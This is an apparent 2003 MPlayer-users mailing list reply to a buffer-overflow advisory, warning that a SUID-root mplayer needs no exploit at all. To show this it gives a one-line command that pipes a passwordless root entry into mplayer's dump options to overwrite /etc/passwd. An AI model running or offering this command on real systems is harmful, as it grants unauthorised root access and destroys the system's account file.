[MPlayer-users] Re: Buffer Overflow in Mplayer v0.91 and prior
Stefan Seyfried
seife at gmane0305.slipkontur.de
Tue Sep 2 09:46:28 CEST 2003
Joonas Koivunen <rzei at mbnet.fi> writes:
> Well what if someone gains access on a system where gmplayer ran with SUID,
> wouldn't it be possible to gain root shell via this exploit?
if mplayer is suid root, then you don't need any exploit.
echo "root::0:0:b1g h4x0r:/root:/bin/bash" | \
mplayer -dumpstream -dumpfile /etc/passwd -
so NEVER suid mplayer. But this is in TFM.
--
Stefan Seyfried, seife at gmane0305.slipkontur.de
+----------------------------------------------+
"If you want to travel around the world and be invited to speak at a lot of
different places, just write a Unix operating system." -- [Linus Torvalds]
More information about the MPlayer-users
mailing list